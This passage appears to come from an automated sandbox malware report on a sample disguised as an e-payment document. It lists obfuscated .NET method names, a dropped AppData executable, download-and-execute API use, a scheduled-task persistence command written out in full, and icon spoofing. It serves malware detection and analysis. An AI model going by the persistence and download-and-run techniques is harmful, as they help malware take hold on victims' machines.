            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, AMdNgs1C5Wh7whKrJR.csHigh entropy of concatenated method names: 'dg4NJOuCQ1', 'KqGNBrxYZh', 'ARINi7Sym3', 'MCnNX5Ap3c', 'NoYNCYIwCq', 'UrVNrEks0L', 'J3XNgPk7Pb', 'jNgNbSHgVW', 'kANNGsj1B5', 'q5RNQcq6A5'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, Yt8bxSrDHY74lmgX1O.csHigh entropy of concatenated method names: 'tB99b8eYYq', 'zcK9QVXega', 'H5deLfuPQ6', 'tBXeKTLx8A', 'D2L93rE9KO', 'boI9828ax2', 'VKC9tm3GUB', 'qYd9Jxhk1M', 'RpI9B7JHW9', 'j1p9i4BSj3'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, KZRuUXbRDNZIxhMQ9X.csHigh entropy of concatenated method names: 'mJTeSJ2POL', 'tkEeNxk6v5', 'qkneAM3AYB', 'XtPelIvt1S', 'bLoeWa1G2e', 'BQdenx67Hj', 'jXXeIXvkgB', 'jnae0ReC7u', 'qtneRZl0EX', 'gG7ejtHKiJ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, VDBWLRDS2RfjQficRW.csHigh entropy of concatenated method names: 'IrClZMq7vq', 'QFrlqkJclV', 'js5Aux07g8', 'TncAF0H7lD', 'lulAU7ETUd', 'IAfA6Yd97I', 'HgUATwBoaC', 'do7AHsFp6H', 'JqLAybNjup', 'pDUAhPIwib'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, Rc3IhyQpIM2qjSGJZ7.csHigh entropy of concatenated method names: 'yo7oKXccF4', 'yjOowRsQ1d', 'y5uokIUbBC', 'PI2oSfG6kC', 'ox0oNn16M2', 'kp8ol3AbQA', 't2JoWu4ew2', 'XrQegNSm2C', 'JuiebOVjvC', 'oK9eGISbBa'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, mAs9Z5JbfVQvPBhYBI.csHigh entropy of concatenated method names: 'XcpEhwinI1', 'BioE8Z75or', 'DumEJUT61M', 'arFEBYPBcK', 'XbvE4ZscCI', 'OJkEuTmLYj', 'lqbEFXlAwJ', 'mFnEUl3fcE', 'hgTE6Kkl7C', 'w1PETD0vI8'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, W0VonaGr5hcTpAbTQZ.csHigh entropy of concatenated method names: 'pwKemh4eIq', 'ahve4VNEtD', 'OrveuEfGkl', 'BU0eFnyP2O', 'dbweJVjkDd', 'p6feUiRmvq', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, atuRJ3TU8htJN5Xrv0.csHigh entropy of concatenated method names: 'S0vnSxPYmc', 'cG9nAMC28O', 'hI1nW2KiW1', 'eYDWQP9OLW', 'oSRWzvOKUk', 'NldnLdIPAn', 'QcknKB4BIC', 'fNAn5QvNq3', 'y7enwNHdyO', 'CUOnkWAksS'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, gH50Mg5ADNSMKJgZZY.csHigh entropy of concatenated method names: 'IO8xmc5rP', 'yhldqwoKE', 'apQVkaRG2', 'nf0qMdgeO', 'vJFPABrDA', 'rH6DluZsg', 'KgcvgcYoHP0Jd4gs65', 'SdBNZ0orG6ScaBqob7', 'dxre5Z5Qb', 'oOyMjIM5f'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, eX7sUIKLXbLBJFUXJss.csHigh entropy of concatenated method names: 'woGoYhHK1o', 'xtJosFQbfX', 'fUNoxlMKKO', 'bNmodohltZ', 'ADCoZLb1bE', 'nZBoVAOPPd', 'SR6oqoKxC4', 'dg0o1D60ZE', 'lXvoPSko2K', 'AEPoDwH9yV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, FoCs0V4dUW7V9Ys8RL.csHigh entropy of concatenated method names: 'EU7KbyI9fmOqp1QSTU0', 'FqUuypIUQtji1NQJx7g', 'zxHWed1vib', 'EGGWoVt38U', 'G8cWMOZjhr', 'zCih6WIyfi1yoX40fke', 'Ndd86NImLqRtr3wfD2N'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, j6u7xiPYRpOJPHghlF.csHigh entropy of concatenated method names: 'UJEAdt1fko', 'd97AVgVlHu', 'NcuA1UAr7m', 'Tu3AP42ys1', 'qW3AEG10BF', 'JG5AOZP9g7', 'ry7A9fCiHa', 'sJYAea4coq', 'IM7Ao1R0PF', 'NRgAMuPOqZ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.csHigh entropy of concatenated method names: 'wZmwaJ0lMI', 'lOZwSBnVIT', 's8swNce0dM', 'aq0wATSknj', 'k5ywl5BoHo', 'aaMwWNmETw', 'KxnwnosyNW', 'JGLwI2ERu4', 'Tc0w0XfKsR', 'uNZwRTqrmV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, GIcmcBXmdsr9o6R5jH.csHigh entropy of concatenated method names: 'rar9R8yDPU', 'LSl9j9E0tQ', 'ToString', 'yAQ9Sp11go', 'eNs9NOZoTc', 'cuV9AWqlmf', 'gVt9lYT05n', 'oPx9WxyIRH', 'AJw9nrddHN', 'tBj9I8Rc7R'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, aJXx8DABJGbejPMByH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GtQ5GT9B6G', 'Pbu5QFNrfK', 'wDs5zgWekY', 'xaowLO9Il7', 'IOJwKcXv6R', 'HuXw5kpssR', 'jtPwwUYtOC', 'UdFGnL30xPZwNsgKrEN'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, LS7EsZky9IidIcyfRu.csHigh entropy of concatenated method names: 'KJZKnMdNgs', 'U5WKIh7whK', 'TYRKRpOJPH', 'VhlKjFrDBW', 'wicKERWcGI', 'L7vKOGkmTJ', 'rTVh9BxhHLC1hpgjne', 'Um4K2Xrl2MiwoUVpmk', 'SQnKKKQ0w3', 'Py2Kwpe6ao'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, vGIT7vmGkmTJonR3Jr.csHigh entropy of concatenated method names: 'FI9WagBBwr', 'AX0WNuglZI', 'f0bWl3O1qa', 'bDoWnaWcS5', 'daZWIYWV6s', 'QCelCF9Fxs', 'SpalrkUifC', 'wZUlgEyKTb', 'ry9lbmWrC3', 'NIclG4tgSQ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, bR6muntND966Zj1tHg.csHigh entropy of concatenated method names: 'NwM71lP3vJ', 'ScV7PlhL8V', 'mwx7moNQs4', 'IAk74sSG1k', 'vPM7FlVT5P', 'LK17UsQlhM', 'Feb7T5Kr89', 'HXc7HIT0Ce', 'zBt7hQGx3c', 'GsE730ao45'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, al7GZ9yc9cs62qKrsm.csHigh entropy of concatenated method names: 'HtknYldqg0', 'cgCnsNbeMp', 'MvhnxYukUN', 'C7VndIvOW8', 'iSPnZZDQV5', 'LMenVyh3dv', 'qRUnqcHeeV', 'FLin1NxT2A', 'MWSnP7Buot', 'SZWnDvjqjR'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, TM8wBMKwOiMiiMRkZ5P.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mNhMJ0SgvM', 'O7lMBfJQPr', 'WDuMiv94X8', 'SlmMXYHrqC', 'ep8MC6TXRj', 'uPHMrAU5Jv', 'mpWMgnogDd'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, n0YQspKKCBy6FdP62Xy.csHigh entropy of concatenated method names: 'ToString', 'STPMwBdd9Y', 'qa9Mkub752', 'FTCMaYXvuD', 'mPRMSJDXLw', 'ecwMN0SU2B', 'Yd2MASNmRQ', 'yK8Mlrl9b1', 'Bhy9wBnasMBAWMnOJ5J', 'KnhCxRnGWRcYTQGrmwk'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, n549rSinEmAngKcBlV.csHigh entropy of concatenated method names: 'ToString', 'tqNO3p76rM', 'Nt4O4akmL3', 'EAUOuWNNjT', 'AvlOF5KtPL', 'wfIOUpI9Jj', 'pQ9O6e2iMp', 'LwaOTj9t4g', 'aYGOHLjW1o', 'fY8OyvE0sq'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, uYj2wPN1bAqkIUsRaQ.csHigh entropy of concatenated method names: 'Dispose', 'e0bKGLVBl0', 'AO954twDAn', 'Ltp114hTQB', 'T6ZKQRuUXR', 'FNZKzIxhMQ', 'ProcessDialogKey', 'qXg5L0Vona', 'V5h5KcTpAb', 'LQZ55Bc3Ih'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, AMdNgs1C5Wh7whKrJR.csHigh entropy of concatenated method names: 'dg4NJOuCQ1', 'KqGNBrxYZh', 'ARINi7Sym3', 'MCnNX5Ap3c', 'NoYNCYIwCq', 'UrVNrEks0L', 'J3XNgPk7Pb', 'jNgNbSHgVW', 'kANNGsj1B5', 'q5RNQcq6A5'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, Yt8bxSrDHY74lmgX1O.csHigh entropy of concatenated method names: 'tB99b8eYYq', 'zcK9QVXega', 'H5deLfuPQ6', 'tBXeKTLx8A', 'D2L93rE9KO', 'boI9828ax2', 'VKC9tm3GUB', 'qYd9Jxhk1M', 'RpI9B7JHW9', 'j1p9i4BSj3'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, KZRuUXbRDNZIxhMQ9X.csHigh entropy of concatenated method names: 'mJTeSJ2POL', 'tkEeNxk6v5', 'qkneAM3AYB', 'XtPelIvt1S', 'bLoeWa1G2e', 'BQdenx67Hj', 'jXXeIXvkgB', 'jnae0ReC7u', 'qtneRZl0EX', 'gG7ejtHKiJ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, VDBWLRDS2RfjQficRW.csHigh entropy of concatenated method names: 'IrClZMq7vq', 'QFrlqkJclV', 'js5Aux07g8', 'TncAF0H7lD', 'lulAU7ETUd', 'IAfA6Yd97I', 'HgUATwBoaC', 'do7AHsFp6H', 'JqLAybNjup', 'pDUAhPIwib'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, Rc3IhyQpIM2qjSGJZ7.csHigh entropy of concatenated method names: 'yo7oKXccF4', 'yjOowRsQ1d', 'y5uokIUbBC', 'PI2oSfG6kC', 'ox0oNn16M2', 'kp8ol3AbQA', 't2JoWu4ew2', 'XrQegNSm2C', 'JuiebOVjvC', 'oK9eGISbBa'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, mAs9Z5JbfVQvPBhYBI.csHigh entropy of concatenated method names: 'XcpEhwinI1', 'BioE8Z75or', 'DumEJUT61M', 'arFEBYPBcK', 'XbvE4ZscCI', 'OJkEuTmLYj', 'lqbEFXlAwJ', 'mFnEUl3fcE', 'hgTE6Kkl7C', 'w1PETD0vI8'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, W0VonaGr5hcTpAbTQZ.csHigh entropy of concatenated method names: 'pwKemh4eIq', 'ahve4VNEtD', 'OrveuEfGkl', 'BU0eFnyP2O', 'dbweJVjkDd', 'p6feUiRmvq', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, atuRJ3TU8htJN5Xrv0.csHigh entropy of concatenated method names: 'S0vnSxPYmc', 'cG9nAMC28O', 'hI1nW2KiW1', 'eYDWQP9OLW', 'oSRWzvOKUk', 'NldnLdIPAn', 'QcknKB4BIC', 'fNAn5QvNq3', 'y7enwNHdyO', 'CUOnkWAksS'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, gH50Mg5ADNSMKJgZZY.csHigh entropy of concatenated method names: 'IO8xmc5rP', 'yhldqwoKE', 'apQVkaRG2', 'nf0qMdgeO', 'vJFPABrDA', 'rH6DluZsg', 'KgcvgcYoHP0Jd4gs65', 'SdBNZ0orG6ScaBqob7', 'dxre5Z5Qb', 'oOyMjIM5f'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, eX7sUIKLXbLBJFUXJss.csHigh entropy of concatenated method names: 'woGoYhHK1o', 'xtJosFQbfX', 'fUNoxlMKKO', 'bNmodohltZ', 'ADCoZLb1bE', 'nZBoVAOPPd', 'SR6oqoKxC4', 'dg0o1D60ZE', 'lXvoPSko2K', 'AEPoDwH9yV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, FoCs0V4dUW7V9Ys8RL.csHigh entropy of concatenated method names: 'EU7KbyI9fmOqp1QSTU0', 'FqUuypIUQtji1NQJx7g', 'zxHWed1vib', 'EGGWoVt38U', 'G8cWMOZjhr', 'zCih6WIyfi1yoX40fke', 'Ndd86NImLqRtr3wfD2N'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, j6u7xiPYRpOJPHghlF.csHigh entropy of concatenated method names: 'UJEAdt1fko', 'd97AVgVlHu', 'NcuA1UAr7m', 'Tu3AP42ys1', 'qW3AEG10BF', 'JG5AOZP9g7', 'ry7A9fCiHa', 'sJYAea4coq', 'IM7Ao1R0PF', 'NRgAMuPOqZ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.csHigh entropy of concatenated method names: 'wZmwaJ0lMI', 'lOZwSBnVIT', 's8swNce0dM', 'aq0wATSknj', 'k5ywl5BoHo', 'aaMwWNmETw', 'KxnwnosyNW', 'JGLwI2ERu4', 'Tc0w0XfKsR', 'uNZwRTqrmV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, GIcmcBXmdsr9o6R5jH.csHigh entropy of concatenated method names: 'rar9R8yDPU', 'LSl9j9E0tQ', 'ToString', 'yAQ9Sp11go', 'eNs9NOZoTc', 'cuV9AWqlmf', 'gVt9lYT05n', 'oPx9WxyIRH', 'AJw9nrddHN', 'tBj9I8Rc7R'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, aJXx8DABJGbejPMByH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GtQ5GT9B6G', 'Pbu5QFNrfK', 'wDs5zgWekY', 'xaowLO9Il7', 'IOJwKcXv6R', 'HuXw5kpssR', 'jtPwwUYtOC', 'UdFGnL30xPZwNsgKrEN'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, LS7EsZky9IidIcyfRu.csHigh entropy of concatenated method names: 'KJZKnMdNgs', 'U5WKIh7whK', 'TYRKRpOJPH', 'VhlKjFrDBW', 'wicKERWcGI', 'L7vKOGkmTJ', 'rTVh9BxhHLC1hpgjne', 'Um4K2Xrl2MiwoUVpmk', 'SQnKKKQ0w3', 'Py2Kwpe6ao'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, vGIT7vmGkmTJonR3Jr.csHigh entropy of concatenated method names: 'FI9WagBBwr', 'AX0WNuglZI', 'f0bWl3O1qa', 'bDoWnaWcS5', 'daZWIYWV6s', 'QCelCF9Fxs', 'SpalrkUifC', 'wZUlgEyKTb', 'ry9lbmWrC3', 'NIclG4tgSQ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, bR6muntND966Zj1tHg.csHigh entropy of concatenated method names: 'NwM71lP3vJ', 'ScV7PlhL8V', 'mwx7moNQs4', 'IAk74sSG1k', 'vPM7FlVT5P', 'LK17UsQlhM', 'Feb7T5Kr89', 'HXc7HIT0Ce', 'zBt7hQGx3c', 'GsE730ao45'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, al7GZ9yc9cs62qKrsm.csHigh entropy of concatenated method names: 'HtknYldqg0', 'cgCnsNbeMp', 'MvhnxYukUN', 'C7VndIvOW8', 'iSPnZZDQV5', 'LMenVyh3dv', 'qRUnqcHeeV', 'FLin1NxT2A', 'MWSnP7Buot', 'SZWnDvjqjR'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, TM8wBMKwOiMiiMRkZ5P.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mNhMJ0SgvM', 'O7lMBfJQPr', 'WDuMiv94X8', 'SlmMXYHrqC', 'ep8MC6TXRj', 'uPHMrAU5Jv', 'mpWMgnogDd'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, n0YQspKKCBy6FdP62Xy.csHigh entropy of concatenated method names: 'ToString', 'STPMwBdd9Y', 'qa9Mkub752', 'FTCMaYXvuD', 'mPRMSJDXLw', 'ecwMN0SU2B', 'Yd2MASNmRQ', 'yK8Mlrl9b1', 'Bhy9wBnasMBAWMnOJ5J', 'KnhCxRnGWRcYTQGrmwk'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, n549rSinEmAngKcBlV.csHigh entropy of concatenated method names: 'ToString', 'tqNO3p76rM', 'Nt4O4akmL3', 'EAUOuWNNjT', 'AvlOF5KtPL', 'wfIOUpI9Jj', 'pQ9O6e2iMp', 'LwaOTj9t4g', 'aYGOHLjW1o', 'fY8OyvE0sq'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, uYj2wPN1bAqkIUsRaQ.csHigh entropy of concatenated method names: 'Dispose', 'e0bKGLVBl0', 'AO954twDAn', 'Ltp114hTQB', 'T6ZKQRuUXR', 'FNZKzIxhMQ', 'ProcessDialogKey', 'qXg5L0Vona', 'V5h5KcTpAb', 'LQZ55Bc3Ih'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, AMdNgs1C5Wh7whKrJR.csHigh entropy of concatenated method names: 'dg4NJOuCQ1', 'KqGNBrxYZh', 'ARINi7Sym3', 'MCnNX5Ap3c', 'NoYNCYIwCq', 'UrVNrEks0L', 'J3XNgPk7Pb', 'jNgNbSHgVW', 'kANNGsj1B5', 'q5RNQcq6A5'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, Yt8bxSrDHY74lmgX1O.csHigh entropy of concatenated method names: 'tB99b8eYYq', 'zcK9QVXega', 'H5deLfuPQ6', 'tBXeKTLx8A', 'D2L93rE9KO', 'boI9828ax2', 'VKC9tm3GUB', 'qYd9Jxhk1M', 'RpI9B7JHW9', 'j1p9i4BSj3'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, KZRuUXbRDNZIxhMQ9X.csHigh entropy of concatenated method names: 'mJTeSJ2POL', 'tkEeNxk6v5', 'qkneAM3AYB', 'XtPelIvt1S', 'bLoeWa1G2e', 'BQdenx67Hj', 'jXXeIXvkgB', 'jnae0ReC7u', 'qtneRZl0EX', 'gG7ejtHKiJ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, VDBWLRDS2RfjQficRW.csHigh entropy of concatenated method names: 'IrClZMq7vq', 'QFrlqkJclV', 'js5Aux07g8', 'TncAF0H7lD', 'lulAU7ETUd', 'IAfA6Yd97I', 'HgUATwBoaC', 'do7AHsFp6H', 'JqLAybNjup', 'pDUAhPIwib'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, Rc3IhyQpIM2qjSGJZ7.csHigh entropy of concatenated method names: 'yo7oKXccF4', 'yjOowRsQ1d', 'y5uokIUbBC', 'PI2oSfG6kC', 'ox0oNn16M2', 'kp8ol3AbQA', 't2JoWu4ew2', 'XrQegNSm2C', 'JuiebOVjvC', 'oK9eGISbBa'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, mAs9Z5JbfVQvPBhYBI.csHigh entropy of concatenated method names: 'XcpEhwinI1', 'BioE8Z75or', 'DumEJUT61M', 'arFEBYPBcK', 'XbvE4ZscCI', 'OJkEuTmLYj', 'lqbEFXlAwJ', 'mFnEUl3fcE', 'hgTE6Kkl7C', 'w1PETD0vI8'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, W0VonaGr5hcTpAbTQZ.csHigh entropy of concatenated method names: 'pwKemh4eIq', 'ahve4VNEtD', 'OrveuEfGkl', 'BU0eFnyP2O', 'dbweJVjkDd', 'p6feUiRmvq', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, atuRJ3TU8htJN5Xrv0.csHigh entropy of concatenated method names: 'S0vnSxPYmc', 'cG9nAMC28O', 'hI1nW2KiW1', 'eYDWQP9OLW', 'oSRWzvOKUk', 'NldnLdIPAn', 'QcknKB4BIC', 'fNAn5QvNq3', 'y7enwNHdyO', 'CUOnkWAksS'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, gH50Mg5ADNSMKJgZZY.csHigh entropy of concatenated method names: 'IO8xmc5rP', 'yhldqwoKE', 'apQVkaRG2', 'nf0qMdgeO', 'vJFPABrDA', 'rH6DluZsg', 'KgcvgcYoHP0Jd4gs65', 'SdBNZ0orG6ScaBqob7', 'dxre5Z5Qb', 'oOyMjIM5f'
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c13_2_0040A71E
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeFile created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Icon mismatch, binary includes an icon from a different legit application in order to fool users
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
